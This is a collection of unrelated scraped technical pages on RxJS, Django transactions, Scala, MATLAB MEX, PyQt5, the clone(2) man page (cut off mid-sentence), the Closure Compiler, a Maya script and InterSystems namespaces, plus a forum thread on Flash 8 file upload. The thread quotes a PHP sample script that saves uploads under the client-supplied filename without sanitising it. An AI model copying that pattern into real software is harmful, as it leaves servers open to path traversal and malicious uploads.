I've used the rxjs-hooks for my logic gate simulator and it worked great! I've also used it with sapper for visual studio paint, the lack of proper ts support in sapper wasn't that good but except for that it was a really nice experience. RxJS is definitely my favorite lib to use for side projects :)

Thanks mate, this has been very very helpful. The first time I ever encountered RxJS is when I started learning Angular, and I was really scared for no reason (maybe because of the Angular learning curve at the time I started learning it), then I stopped learning Angular and RxJS. This post here marks my comeback, thanks a lot.

Thanks for that article! Really useful and you make RxJS easy to start with by building on your examples. Keep them coming!
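Footnote (not part of the original article): the subscribe/clean-up contract that useObservable relies on can be modelled without React or RxJS at all. The makeObservable helper below is a hypothetical stand-in, not an RxJS API — just enough surface area to show why unsubscribing in the effect's clean-up stops further state updates.

```javascript
// Minimal stand-in for an Observable: subscribe() registers an observer
// and returns a subscription whose unsubscribe() removes it again.
function makeObservable() {
  const observers = new Set();
  return {
    subscribe(fn) {
      observers.add(fn);
      return { unsubscribe: () => observers.delete(fn) };
    },
    next(value) {
      observers.forEach(fn => fn(value));
    },
  };
}

// What useObservable does on mount/unmount, without React:
const names$ = makeObservable();
let state;                                          // plays the role of useState
const sub = names$.subscribe(v => { state = v; });  // the useEffect body
names$.next(['Adam', 'Brian']);                     // an emission "re-renders"
sub.unsubscribe();                                  // the clean-up function
names$.next(['ignored']);                           // no further updates arrive
```

After unsubscribing, later emissions never reach the observer, which is exactly why the hook's clean-up prevents setState being called on an unmounted component.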
https://dev.to/bitovi/rxjs-with-react-jek
Opened 5 years ago
Closed 5 years ago
Last modified 5 years ago

#20571 closed Bug (fixed)

Using savepoints within transaction.atomic() can result in the entire transaction being incorrectly and silently rolled back

Description

Using savepoints within transaction.atomic() can result in the entire transaction being incorrectly and silently rolled back. Here is a slightly contrived example:

    from django.db import transaction, DatabaseError

    with transaction.atomic():
        user = User.objects.all()[0]
        user.last_login = datetime.datetime.utcnow() # any change to demonstrate problem
        user.save()

        sid = transaction.savepoint()
        try:
            # Will always fail
            User.objects.create(pk=user.pk)
            transaction.savepoint_commit(sid)
        except DatabaseError:
            transaction.savepoint_rollback(sid)

    # outside of atomic() context - user.last_login change has not been committed!

What happens is the .create() call fails and marks the outermost atomic block as requiring a rollback, so even though we call savepoint_rollback (which does exactly the right thing), once we leave the outer transaction.atomic(), the entire transaction is rolled back. In the example above, this means that the change to last_login is not persisted in the database. Rather insidiously, it is done entirely silently. :) (The outer transaction.atomic() seems a little contrived, but note that it is equivalent to the wrapper added by ATOMIC_REQUESTS.)

I'm not entirely sure what the solution is; the transaction.atomic(savepoint=False) call within ModelBase.save_base simply does not (and cannot) know that some other code will manually handle the savepoint rollback, and thus has no choice but to mark the entire transaction as borked. The only way it could know is if .create and .save took yet another kwarg, but this seems bizarre and would not be at all obvious. Maybe manual savepoints should become a private API after all (contradicting the current note in the documentation).
Alternatively, it could be clarified that "manual" savepoint management should not be used in conjunction with atomic() blocks (and thus ATOMIC_REQUESTS). The behaviour above is certainly not obvious at all. (Hm, update_or_create uses savepoints manually, I hope that isn't breaking installations?)

Change History (13)

comment:1 Changed 5 years ago by

comment:2 follow-up: 4 Changed 5 years ago by

One solution is to remove the savepoint=False option. But it was included for two good reasons:

- it improves performance,
- it avoids breaking all assertNumQueries with extra SAVEPOINT / RELEASE SAVEPOINT queries.

Another solution is to discourage using the low-level API. Technically, the inner block in the example above is strictly equivalent to:

    with transaction.atomic():
        User.objects.create(pk=user.pk)

I'm in favor of the second solution because I have yet to see a use case that isn't covered by transaction.atomic(). There aren't many patterns for using savepoints in an application.

comment:3 Changed 5 years ago by

This is the idea I was considering: - seems to work OK.

comment:4 Changed 5 years ago by

    Technically, the inner block in the example above is strictly equivalent to:

        with transaction.atomic():
            User.objects.create(pk=user.pk)

Yes, although one still needs to catch the DatabaseError to be literally identical. :)

    I'm in favor of the second solution because I have yet to see a use case that isn't covered by transaction.atomic(). There aren't many patterns for using savepoints in an application.

Just for clarity: I assume here you mean there aren't many patterns for using savepoints *that are not also covered by using transaction.atomic*.

    I wonder if savepoint_commit() and savepoint_rollback() could just mark the transaction block as "correct" again. Wouldn't this solve the problem?

No. That's too blunt, as there is no way to know we are rolling back to a savepoint that results in a clean block.
I'm not explaining that very well, so here's an untested example:

    with transaction.atomic():
        s1 = transaction.savepoint()
        try:
            User.objects.create(pk=user.pk)
        except DatabaseError:
            # block now correctly marked as requiring rollback
            s2 = transaction.savepoint()
            # [..]
            transaction.savepoint_rollback(s2)
            # Oops. Assuming your solution, the block would now be incorrectly
            # marked as *not* requiring rollback even though it is required
            # due to the User.objects.create failure. We would only be able to
            # mark the block as clean if we rolled back to s1, but we have no
            # way of knowing that.

comment:5 Changed 5 years ago by

[Reverting to "bug"; seemed like an accidental change considering the severity is "release blocker".]

comment:6 Changed 5 years ago by

I see. But isn't this a problem in current Django code, too:

    with transaction.atomic():
        try:
            User.objects.create(pk=user.pk)
            # exception marks connection needing rollback
        except Exception:
            with transaction.atomic():
                # do something that raises exception
                # exception marks needs_rollback = False
                # Whoops, the outer block is marked clean!

comment:7 Changed 5 years ago by

I was wrong in the above example: the second transaction.atomic() doesn't create any savepoints, as the whole transaction needs to be rolled back anyways. Thus the needs_rollback flag isn't cleared. I updated the patch. Now you can't create savepoints in failed blocks, so s2 in the example of comment:4 would fail. This seems good enough; there really isn't any point in creating a savepoint which is going to be rolled back anyways.

As for: do we need the ability to use manual savepoints? If possible, yes. Some things become nasty to code if your only option is using exceptions. Say, you call a method, and if that method returns false you will need to roll back the current savepoint.
Options:

    def myf():
        sp = savepoint()
        if somemethod():
            savepoint_commit(sp)
        else:
            savepoint_rollback(sp)

    def myf():
        try:
            with atomic():
                if somemethod():
                    return
                else:
                    raise FakeException  # This will now rollback the savepoint.
        except FakeException:
            return

Another situation where atomic() isn't easy is if you have different paths for enter and exit. Then naturally any with statement can't be used. An example is TransactionMiddleware.

comment:8 Changed 5 years ago by

comment:9 Changed 5 years ago by

Anssi, I read your code, I read your arguments, and I understand what you're trying to achieve, but I don't think that's the right way.

My work on transactions sets up a strict top-down control flow. The high-level API (atomic) drives the low-level APIs (commit/rollback, savepoint_commit/rollback). The low-level API never hooks back up inside the high-level API. (Well, right now commit/rollback still reset the dirty flag, but that's deprecated and going away.) Your proposal introduces a reversed control flow, making it harder to reason about the behavior, and I'm not comfortable with that.

My instinct initially told me not to include the savepoint=False option. I eventually added it because you convinced me it was important and I couldn't find any way to break it. However, this ticket shows that I wasn't creative enough. Every additional complexity creates a risk of unforeseen interactions, and I'm becoming paranoid, because any transaction-related bug is a data loss bug.

In addition to the two proposals I made in comment 2, here's a third one: add an advanced API to mark the innermost atomic block as needing or not needing rollback. This solution /probably/ works as expected, since the only purpose of needs_rollback is to declare that an inner atomic block without a savepoint exited with an exception and the innermost atomic block that has a savepoint should exit with a rollback.
By resetting needs_rollback, you disable this behavior, which is the root cause of the bug described here. As a matter of fact, that's already what I'm doing in TestCase._fixture_teardown, except I'm forcing a rollback instead of preventing one.

So we have two solutions: document needs_rollback as a public API, or introduce a getter and a setter around needs_rollback. I'm in favor of the second solution since it allows the API to live in django.db.transaction. Proof-of-concept patch coming shortly.

comment:10 Changed 5 years ago by

I've written the patch and I'm now 100% sure it's the way to go. I'm committing it.

comment:11 Changed 5 years ago by

comment:12 Changed 5 years ago by

comment:13 Changed 5 years ago by

I think Django should prevent running *anything else* than rollback or savepoint rollback once inside a transaction that is marked as needs_rollback. This is what PostgreSQL does, and with good reason - letting users continue a transaction that will be rolled back anyways will lead to errors. The addition of the needs_rollback API lets users continue after errors when needed, but do so only explicitly.

BTW I think I proposed adding an @in_transaction decorator, not atomic(savepoint=False). This would have been a no-op if a transaction was going on, otherwise it would have created a transaction. This is subtly different from @atomic(savepoint=False), which marks the outer block for needs_rollback on errors. @in_transaction is what is needed by model.save() for example (and yes, using savepoints unconditionally in that case is too expensive). In any case, this ticket is already solved, so time to move on.

I'll mark this as release blocker, seems like some solution is going to be needed...

I haven't tested anything, but I feel confident enough in the report to just mark this accepted, too.

I wonder if savepoint_commit() and savepoint_rollback() could just mark the transaction block as "correct" again. Wouldn't this solve the problem?
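To make the needs_rollback behaviour discussed in this ticket concrete, here is a framework-free toy model. Connection and atomic below are illustrative names, not Django's implementation — real code should use django.db.transaction.atomic and the get_rollback()/set_rollback() API that resolved this ticket — but the sketch reproduces the reported symptom: an exception escaping an inner block that has no savepoint poisons the whole transaction, even if the caller catches it.

```python
class Connection:
    def __init__(self):
        self.committed = []        # writes that survived the transaction
        self.pending = []          # writes inside the open transaction
        self.depth = 0             # nesting depth of atomic blocks
        self.needs_rollback = False

class atomic:
    def __init__(self, conn, savepoint=True):
        self.conn, self.savepoint = conn, savepoint

    def __enter__(self):
        self.conn.depth += 1
        # Inner blocks may mark a savepoint (here: an index into pending).
        inner = self.conn.depth > 1
        self.sid = len(self.conn.pending) if (self.savepoint and inner) else None
        return self

    def __exit__(self, exc_type, exc, tb):
        conn = self.conn
        conn.depth -= 1
        if conn.depth == 0:
            # Outermost block: commit unless the transaction was poisoned.
            if exc_type is None and not conn.needs_rollback:
                conn.committed.extend(conn.pending)
            conn.pending.clear()
            conn.needs_rollback = False
        elif exc_type is not None:
            if self.sid is not None:
                del conn.pending[self.sid:]   # roll back to the savepoint
            else:
                conn.needs_rollback = True    # poison the whole transaction
        return False                          # always re-raise

# Ticket scenario: the failing inner block has NO savepoint (like
# model.save() using atomic(savepoint=False)), so catching the error
# does not help -- the outer work is silently discarded.
conn = Connection()
with atomic(conn):
    conn.pending.append("update last_login")
    try:
        with atomic(conn, savepoint=False):
            raise RuntimeError("IntegrityError: duplicate pk")
    except RuntimeError:
        pass
# conn.committed == [] -- the last_login change was lost.

# With a real savepoint, only the inner work is rolled back.
conn2 = Connection()
with atomic(conn2):
    conn2.pending.append("update last_login")
    try:
        with atomic(conn2, savepoint=True):
            conn2.pending.append("duplicate pk")
            raise RuntimeError("IntegrityError")
    except RuntimeError:
        pass
# conn2.committed == ["update last_login"]
```

The second scenario is why the thread recommends a nested transaction.atomic() (which manages its own savepoint) over manual savepoint calls.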
https://code.djangoproject.com/ticket/20571
A Scala method gets an input and should operate either on the input directly or on a calculation of it. For instance, consider the following code:

    def foo(b: Boolean, input: Any): Unit = {
      val changedInput = { if (b) input else bar(input) }
      dowork(changedInput)
    }

There is no anonymous function in your example, and the code you write is, IMO, just fine. I guess you regard { if (b) input else bar(input) } as an anonymous function. It is called a "block" in Scala, which is just an expression whose value is the last expression contained in the block. For instance, the value of { expr1; expr2; expr3 } is the value of expr3. So your code can just be written as

    def foo(b: Boolean, input: Any): Unit = {
      val changedInput = if (b) input else bar(input)
      dowork(changedInput)
    }

since there is only one expression in your block.
https://codedump.io/share/ZPtxiRwulqPf/1/scala-newbie---if-else
MEX, or MATLAB executable, refers to programs that are automatically loaded and can be called like any MATLAB® function. C++ MEX functions are based on two C++ APIs:

The MATLAB Data API supports MATLAB data types and optimizations like copy-on-write for data arrays passed to MEX functions. For more information, see MATLAB Data API.

A subset of the MATLAB C++ Engine API supports calling MATLAB functions, execution of statements in the MATLAB workspace, and access to variables and objects. For more information, see C++ MEX API.

The C++ MEX API supports C++11 features and is not compatible with the C MEX API. You cannot mix these APIs in a MEX file.

A C++ MEX function is implemented as a class named MexFunction that inherits from matlab::mex::Function. The MexFunction class overrides the function call operator, operator(). This implementation creates a function object that you can call like a function. Calling the MEX function from MATLAB instantiates the function object, which maintains its state across subsequent calls to the same MEX function.

Here is the basic design of a C++ MEX function. It is a subclass of matlab::mex::Function that must be named MexFunction. The MexFunction class overrides the function call operator, operator().

    #include "mex.hpp"
    #include "mexAdapter.hpp"

    class MexFunction : public matlab::mex::Function {
    public:
        void operator()(matlab::mex::ArgumentList outputs, matlab::mex::ArgumentList inputs) {
            // Function implementation
            ...
        }
    };

Inputs and outputs to the MEX function are passed as elements in a matlab::mex::ArgumentList. Each input or output argument is a matlab::data::Array contained in the matlab::mex::ArgumentList. For an example, see Create a C++ MEX Source File.

To call a MEX function, use the name of the file, without the file extension. The calling syntax depends on the input and output arguments defined by the MEX function. The MEX file must be on the MATLAB path or in the current working folder when called.
These examples illustrate the implementation of C++ MEX Functions: arrayProduct.cpp — Multiplies an array by a scalar input and returns the resulting array. yprime.cpp — Defines differential equations for restricted three-body problem. phonebook.cpp — Shows how to manipulate structures. modifyObjectProperty.cpp — Shows how to work with MATLAB.
https://www.mathworks.com/help/matlab/matlab_external/c-mex-functions.html
PyQt5 kernel getting dead while launching a simple programme..

Hiiii everyone, I am new to using the PyQt5 lib. I am wondering why my computer crashes when I try this code:

    from PyQt5 import QtGui
    from PyQt5.QtWidgets import QApplication, QMainWindow
    import sys

    class Window(QMainWindow):
        def __init__(self):
            super().__init__()
            self.title = "PyQt5 Window"
            self.top = 100
            self.left = 100
            self.width = 680
            self.height = 500
            self.InitWindow()

        def InitWindow(self):
            self.setWindowTitle(self.title)
            self.setGeometry(self.top, self.left, self.width, self.height)
            self.show()

    App = QApplication(sys.argv)
    window = Window()
    sys.exit(App.exec())

The kernel is getting dead...

- SGaist Lifetime Qt Champion

Hi and welcome to devnet,

What version of PyQt5 are you using? What version of Qt is it built on? How did you install both of them? What Linux flavour are you running? What graphics card do you have? What driver are you using for it? What do your kernel logs tell you?
https://forum.qt.io/topic/101440/pyqt5-kernel-getting-dead-while-launching-a-simple-programme
NAME
       clone, __clone2 - create a child process

SYNOPSIS
       #define _GNU_SOURCE
       #include <sched.h>

       int clone(int (*fn)(void *), void *child_stack, int flags, void *arg, ...
                 /* pid_t *pid, struct user_desc *tls, pid_t *ctid */ );

DESCRIPTION
       clone() creates a new process, in a manner similar to fork(2). It is
       actually a library function layered on top of the underlying clone()
       system call.

       CLONE_NEWNS (since Linux 2.4.19)
              Start the child in a new namespace. Every process lives in a
              namespace. The namespace of a process is the data (the set of
              mounts) describing the file hierarchy as seen by that process.
              After a fork(2) or clone().

VERSIONS
       There is no entry for clone() in libc5. glibc2 provides clone() as
       described in this manual page.

CONFORMING TO
       The clone() and sys_clone calls are Linux-specific. On ia64, a
       different system call is used:

       int __clone2(int (*fn)(void *), void *child_stack_base, size_t stack_size,
                    int flags, void *arg, ...
                    /* pid_t *pid, struct user_desc *tls, pid_t *ctid */ );

       The __clone2() system call operates in the same way as clone(), except
       that child_stack_base points to the lowest address of the child's stack
       area, and stack_size specifies the size of the stack pointed to by
       child_stack_base.

BUGS
       Versions of the GNU C library that include the NPTL threading library
       contain a wrapper function for getpid(2) that performs caching of
       PIDs. In programs linked against such libraries, calls to getpid(2)
       may return the same value, even when the threads were not created
       using CLONE_THREAD (and thus are not in the same thread group). To get
       the truth, it may be necessary to use code such as the.
http://manpages.ubuntu.com/manpages/hardy/man2/__clone2.2.html
As we are moving away from rich, compiled web client platforms like Java Applets, Flash, and Silverlight, we are filling the gap using complex JavaScript code and HTML5/CSS3 animations. That is all fine until the amount of JavaScript code in the project gets so big that it starts to be scary. Suddenly no one really wants to touch the codebase, as even renaming a variable can be painful and error prone. The development slows down and the quality declines.

When we talk generally about compiling the source to detect errors, we are not really referring to the whole compilation process, which would include: lexical analysis, preprocessing, parsing, semantic analysis, code generation, and code optimization. Most likely we are only interested in the first four steps; the actual code generation and optimization is not essential for catching errors early on.

Compiling JavaScript

The term can be a bit misleading, as the result of this process is not a binary that looks and feels different from the source, but a checked and optimized version of the original source. Statically checking the source in some cases is quite easy: we just have to partially emulate the JavaScript engine and check whether the basic references are okay in the code. The following is quite easy to catch:

    function hello(name){
      window.console.log("hello " + name);
    }

    hello(); // missing parameter

However, the following is a bit harder:

    …
    hello(null); // will print "hello null"

At first glance it's okay, as hello() requires a parameter and null is a parameter. However, running the code would give an undesired result.
As the JavaScript language itself does not solve issues like this, usually all compilers accept hints in the form of comments:

    /**
     * @param {string} name
     */
    function hello(name){
      window.console.log("hello " + name);
    }

    hello(null); // the compiler would catch this

In this case the compiler will use the hint and give a warning:

    WARNING - actual parameter 1 of hello does not match formal parameter.

This gives more feedback to the developer than a Java or C# compiler, as by default null is not accepted: if we expect a string, it means it has to have a value!

Google Closure Compiler

One of the best JavaScript compilers is Google Closure Compiler, which can be very strict with our code and check and enforce all Java-like rules. A nice feature of the tool is that our compiled code is smaller and theoretically faster running than the original one. Of course the real value comes from parsing and statically checking our code, but having harder-to-read production JavaScript code can be handy sometimes.

Renaming, extern and export

One of the very important things about Closure Compiler is that it will rename any variables and functions, and update the references too, to make the code more compact. Variable names help us to read the code, but for the machine they are just strings. Compiling the above code with:

    java -jar compiler.jar --js jsdemo.js --compilation_level=ADVANCED_OPTIMIZATIONS --warning_level VERBOSE

would yield:

    function a(b){window.console.log("hello "+b)}a(null);

However, this can be dangerous, as maybe someone wants to call the hello() function from a different, not compiled codebase. To hint the compiler not to rename something, we have a couple of options. Store it explicitly in the global namespace:

    …
    window['hello'] = hello;

will compile to:

    function a(b){window.console.log("hello "+b)}window.hello=a;a(null);

Even though the hello() function is renamed, a reference is kept to it under the name "hello".
This way the code can still be shorter, but any external dependencies stay intact. The other option, if we want to keep a property/method name intact within an object, is to expose it:

    /** @expose */
    myClass.prototype.myProperty = '';

This can be useful if we need to match the object to a remote system, like mapping JSON values to it from the server - which does not know anything about the compilation.

The third option is to use externs. When we are using external libraries (like jQuery), the compiler will always warn us that:

    $('#div').hide();

    ERROR - variable $ is undeclared

To solve this issue, we simply need to download the jQuery extern file (link below) and use it as an extern. Note: if you can, use the actual library as an extern. In jQuery's case the annotations aren't too good, so the compiler throws a lot of warnings. Just use the jQuery extern file:

    java -jar closure-compiler-latest/compiler.jar --js jsdemo.js --externs externs.js --compilation_level=ADVANCED_OPTIMIZATIONS --warning_level VERBOSE

The code now compiles without warnings.

Tree shaking, dead code removal

One of the really interesting ideas in Closure Compiler is that, just like any reasonable compiler, it will simply drop the code that we are not calling at all. This process is called tree shaking or dead code removal, and the basic idea is that the compiler builds a logical tree of the code dependencies; anything that is not part of this graph is considered dead, so it is removed - or actually just not added to the output.

The following code:

    /**
     * @constructor
     */
    var Hello = function(){}

    /**
     * @param {string} name
     */
    Hello.prototype.hello = function(name){
      window.console.log("hello " + name);
    }

    var h = new Hello();

compiles to an empty string. And that is a good thing - the compiler recognized that hello is never called and the constructor is empty, so it's safe to remove this whole block.
Using this method, the code we compile for every actual webpage might be significantly smaller than just compiling the whole codebase together. Maybe on our home page we don't use alerts or our AJAX library - so those can go too.

Namespaces

Of course Closure Compiler is not without its faults either, so it can be a bit annoying sometimes, complaining about things that are not really problems. Let's say we are working in the "m" namespace, so every file would start with the namespace declaration:

    var m = m || {};
    m.myFunc = function(){…}

This code is perfectly valid and will not destroy m, as it will reassign its original value if it is not null or undefined. However, Closure Compiler would think this would wipe the m variable, so it will give the namespace warning:

    namespace {name of object} should not be redefined

Unfortunately this warning cannot be suppressed using a JavaScript annotation, so one way to work around it is to make it look like a normal variable, not a namespace:

    var m = m || new Object();

As the var x = x || {} form is a hard-wired namespace declaration for Closure, we can cheat and define the same thing using slightly different syntax. However, this will give us a duplicate warning:

    ERROR - Variable m first declared in …

Now, that's an easy one, let's just force the compiler to ignore it:

    /** @suppress{duplicate} */
    var m = m || new Object();

All good, we define the namespace if it was not defined or just reuse it if it was there - without a compiler warning.

Writing JavaScript code is not just adding an alert box any more. Almost all web pages have quite a large codebase, but we neither take JavaScript unit testing seriously nor compile the code to make sure it looks at all reasonable. Turning on ADVANCED_OPTIMIZATIONS in Closure Compiler might not be for everyone as a first step, but running even the basic checks can yield surprising results. Give it a go!

Download Closure Compiler, then check How to annotate JavaScript code for the compiler.
When using external libraries, make sure you download the Closure Externs for it.
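The tree-shaking idea described above — build a dependency graph, keep only what the entry points reach — is just graph reachability. The sketch below is a conceptual model, not Closure Compiler's actual analysis: the call graph is written out by hand, where a real compiler would derive it from the parsed source.

```javascript
// Hand-written call graph: each function maps to the functions it calls.
const callGraph = {
  main: ['hello', 'render'],
  hello: ['log'],
  render: [],
  log: [],
  unusedHelper: ['log'],   // defined, but never reached from main
};

// Depth-first walk from the entry points: everything visited is "live".
function reachable(graph, roots) {
  const seen = new Set();
  const stack = [...roots];
  while (stack.length) {
    const fn = stack.pop();
    if (!seen.has(fn)) {
      seen.add(fn);
      stack.push(...(graph[fn] || []));
    }
  }
  return seen;
}

const live = reachable(callGraph, ['main']);
const dead = Object.keys(callGraph).filter(fn => !live.has(fn));
// dead code (here: unusedHelper) is simply never emitted to the output
```

Note that unusedHelper calls log, yet it is still dead: reachability is computed from the entry points downward, so being a caller of live code does not keep a function alive.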
http://blog.teamleadnet.com/2013/04/compiling-javascript-code-to-detect.html
1) Realtime scale of selected/all Locators, Spheres (see below), or Joints (selection is retained until updated)
2) Add implicit spheres to the transform of selected/all Joints. This fixes the problem of not being able to see joint rotation because the joint shapeNodes don't rotate.
3) Toggle LRA, set Joint Orient to 0 for selected/all Joints
4) Add joints at selected verts.
5) Bind/Unbind skin. New joints added to the hierarchy will be added when skin is re-bound
6) Convenient Undo (same as Maya undo)

I find this useful, but I'm the only one who's ever used it. As always, use with caution. Script is Python. Tested in 2012. Not sure how far back it is compatible.

To run:

    import pixL_faceJointer

To reopen after closing:

    reload(pixL_faceJointer)

Please use the Feature Requests to give me ideas. Please use the Support Forum if you have any questions or problems. Please rate and review in the Review section.
https://www.highend3d.com/maya/script/pixls-facejointer-for-maya
FLASH 8 ONLY.

AS:Main - if you don't have it bookmarked already I'm gonna kick you. Hard.

Ok, so what I'm going to teach you is how to add upload/download functionality to your flashes. The upload will need a server; I'll post one that I found in the Flash help section (I don't know PHP at all), but I haven't tested it, as I have only tested the upload locally.

First things first, here is an example. Now here is what you will be using:

import flash.net.FileReference - Imports the class file you need to be able to use the FileReference class; you must always import this when using uploading/downloading.

FileReference - This is a reference to a file hosted either locally for uploading or globally (well, whatever the word is for online) for downloading.

Listener - You will need to use a listener only if you want to allow uploading.
---

That's the main part, now here are the example codes:

UPLOADING

    //place on main timeline, give upload button instance of uload
    //make a loader component, give it an instance of loadImg
    System.security.allowDomain(" lpexamples.com");
    //that allows the flash to interact with the site hosting the server
    import flash.net.FileReference;
    var myFileRef:FileReference = new FileReference();
    //creates a new instance of the FileReference class
    var selectListen:Object = new Object();
    selectListen.onSelect = function(file:FileReference){
        trace("name: "+file.name);
        trace("size: "+file.size);
        trace("type: "+file.type);
        file.upload(" lash/file_io/uploadFile.php");
        loadImg.load(" flash/file_io/images/"+file.name);
    };
    myFileRef.addListener(selectListen);
    //creates a new listener object, applies actions and then adds it to the file reference
    uload.onPress = function() {
        //when the button with the instance name is pressed, do the following actions
        myFileRef.browse([{description:"Image Files", extension:"*.jpg"}]);
        //opens the browse window, only allowing the user to upload jpg files
    }

DOWNLOADING

    //place on main timeline, give download button instance of dload
    import flash.net.FileReference;
    var myFileRef:FileReference = new FileReference();
    dload.onPress = function() {
        //when the button with the instance name is pressed, do the following actions
        myFileRef.download("file url", "default file name.file extension");
        //opens the browse window, letting the user choose where to save the file
    }

Questions?

Sup, bitches :)

Nice, looks useful

wtfbbqhax

it isn't as well explained as I want, but it's still very useful, thanks

At 9/17/05 03:29 PM, Inglor wrote: it isn't as well explained as I want, but it's still very useful, thanks

You have to find something you don't like, just because I taught you something.. <3 Just ask if you don't understand anything.

Sup, bitches :)

Heh, I just realised something.. on the example when you upload an image, it probably won't open the first time.
Try again and it will, it's because I set the loader to load the file before it had finished uploading XD

Sup, bitches :)

I have a question, is there a file property to see the location of it? Say i want to make an mp3 player, and use the browse function, does it show the C:\Blah\file.mp3 location?

wtfbbqhax

kwl i was wonderin about this for a while thx liam but only flash 8... is there a way to do it for mx 2004 pro ?

Danny

At 9/17/05 03:39 PM, fwe wrote: I have a question, is there a file property to see the location of it? Say i want to make an mp3 player, and use the browse function, does it show the C:\Blah\file.mp3 location?

There isn't exactly, you could use a server to upload the files to temporarily, then play from there. Say you had uploaded the file to, then you would access the file with ""+file.name which is how I did it (badly) with the images in my example. If the flash is run locally and the destination file you want is in the same location as the flash then you would just need to load file.name, but that's unlikely.

Sup, bitches :)

what the uploadFile.php?

is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading)

using ShamelessPlug; NapePhysicsEngine.advertise();

At 9/23/05 11:37 AM, dELta_Luca wrote: is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading)

I don't think so, but you could try playing around with it.

Sup, bitches :)

lol haha rite is there a way to put the uploaded image into a empty movie clip or somin which can be printed of later?

Looked in the helpfile, and I can't seem to find the php code...

wtfbbqhax

At 10/29/05 12:46 PM, fwe wrote: Looked in the helpfile, and I can't seem to find the php code...

Sup, bitches :)

At 10/29/05 12:51 PM, -liam- wrote: At 10/29/05 12:46 PM, fwe wrote: Looked in the helpfile, and I can't seem to find the php code...
Yeah, but doesn't it give the source code so we can put it in our own websites?

wtfbbqhax

At 10/29/05 12:56 PM, fwe wrote: Yeah, but doesn't it give the source code so we can put it in our own websites?

Ah, here it is.. Flash Help > Learning ActionScript 2.0 in Flash > Working With External Data > About File Uploading and Downloading > Adding File Upload Functionality > Click the "to create a..." link.

<?php
$MAXIMUM_FILESIZE = 1024 * 200; // 200KB
$MAXIMUM_FILE_COUNT = 10; // keep maximum 10 files on server
echo exif_imagetype($_FILES['Filedata']);
if ($_FILES['Filedata']['size'] <= $MAXIMUM_FILESIZE) {
    move_uploaded_file($_FILES['Filedata']['tmp_name'], "./temporary/".$_FILES['Filedata']['name']);
    $type = exif_imagetype("./temporary/".$_FILES['Filedata']['name']);
    if ($type == 1 || $type == 2 || $type == 3) {
        rename("./temporary/".$_FILES['Filedata']['name'], "./images/".$_FILES['Filedata']['name']);
    } else {
        unlink("./temporary/".$_FILES['Filedata']['name']);
    }
}
$directory = opendir('./images/');
$files = array();
while ($file = readdir($directory)) {
    array_push($files, array('./images/'.$file, filectime('./images/'.$file)));
}
usort($files, 'sorter');
if (count($files) > $MAXIMUM_FILE_COUNT) {
    $files_to_delete = array_splice($files, 0, count($files) - $MAXIMUM_FILE_COUNT);
    for ($i = 0; $i < count($files_to_delete); $i++) {
        unlink($files_to_delete[$i][0]);
    }
}
print_r($files);
closedir($directory);
function sorter($a, $b) {
    if ($a[1] == $b[1]) {
        return 0;
    } else {
        return ($a[1] < $b[1]) ? -1 : 1;
    }
}
?>

Sup, bitches :)

At 9/23/05 11:37 AM, dELta_Luca wrote: is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading)

i didnt make this, its the example for browse in the dictionary. does anyone know how i would access this file after uploading it?

Thanks to this topic, I've just now figured out how to use the Button Component. I've never really looked at it, and Flash told me what to do.
How did you make the image show on the screen? very cool

- Matt, Rustyarcade.com

Nevermind, I figured it out :P

so how would i play a sound that i just uploaded into the flash player? ok i just realised that i have to upload it to a server. so this changes alot. so is there a way to get the filepath of a file you just selected?

Very helpful. Lol, I haven't bookmarked it yet, and I never will!!!

At 12/26/05 01:03 PM, TheFlashCat wrote: Very helpful. Lol, I haven't bookmarked it yet, and I never will!!!

LOL!!!!! dumbass

wtfbbqhax

At 12/26/05 01:12 PM, fwe wrote: At 12/26/05 01:03 PM, TheFlashCat wrote: Very helpful. Lol, I haven't bookmarked it yet, and I never will!!! LOL!!!!! dumbass

LOL!!! ZOMG!!!1 GO TO TEH HELL!!!!!!1111!!!!!

This question may be better suited for the programming forum but I thought I would ask here first anyway. When using the example code that the actionscript documentation / above provides with macromedia/adobe's test server, it works perfectly. When I try it on my server, Flash thinks that it uploads everything fine and then throws itself into an infinite loop trying to download a file that's not there. When I check the server, the file was never uploaded. I have PHP 5.0.4 installed and working (it works great with the MySQL I was playing with yesterday). I created images and temporary subfolders on the server. I changed all of the URLs in both the fla and php documents. Any ideas? Has anybody gotten this to work on their own servers?

Can a jpg from a web page be directly downloaded and put in a movieclip/bitmap directly without a browser popping up? (except the one from firewall).

AS:Main - if you don't have it bookmarked already I'm gonna kick you. Hard.

punish me master

wwoohh i saw the demo and that was like.... wooooah
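The server-side half of the thread is plain file bookkeeping, so the pruning idea in the PHP script (keep only the newest N uploads, delete the rest) ports to any language. A rough stdlib-only Java sketch of the same logic — the class name, directory handling and mtime-based ordering are illustrative assumptions, not part of the original tutorial:

```java
import java.io.IOException;
import java.nio.file.*;
import java.nio.file.attribute.FileTime;
import java.util.*;

public class UploadPruner {

    // Last-modified time of a file, falling back to epoch on error,
    // mirroring the PHP sample's filectime()-based ordering.
    private static FileTime lastModified(Path p) {
        try {
            return Files.getLastModifiedTime(p);
        } catch (IOException e) {
            return FileTime.fromMillis(0L);
        }
    }

    /** Delete the oldest regular files in dir until at most maxFiles remain. */
    public static void prune(Path dir, int maxFiles) throws IOException {
        List<Path> files = new ArrayList<>();
        try (DirectoryStream<Path> ds = Files.newDirectoryStream(dir)) {
            for (Path p : ds) {
                if (Files.isRegularFile(p)) files.add(p);
            }
        }
        // Oldest first, like the PHP usort on the timestamp column
        files.sort(new Comparator<Path>() {
            @Override public int compare(Path a, Path b) {
                return lastModified(a).compareTo(lastModified(b));
            }
        });
        int excess = files.size() - maxFiles;
        for (int i = 0; i < excess; i++) {
            Files.delete(files.get(i));
        }
    }
}
```

As in the PHP version, the cap is enforced after every upload, so the directory never holds more than the configured number of files.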
http://www.newgrounds.com/bbs/topic/346302
Namespaces

Background Information

In InterSystems IRIS, any code runs within a namespace. A namespace provides access to data and to code, which is stored (typically) in multiple database files. For an introduction, see "Namespaces and Databases" in the Orientation Guide for Server-Side Programming.

Typically you create and configure namespaces via the Management Portal. See "Configuring Namespaces" in the chapter "Configuring InterSystems IRIS" in the System Administration Guide.

Available Tools

Provides the following class methods: Exists(), GetGlobalDest(), GetRoutineDest(). This class also provides the following query: List().
Availability: All namespaces.

Includes the following class method:
Availability: All namespaces.

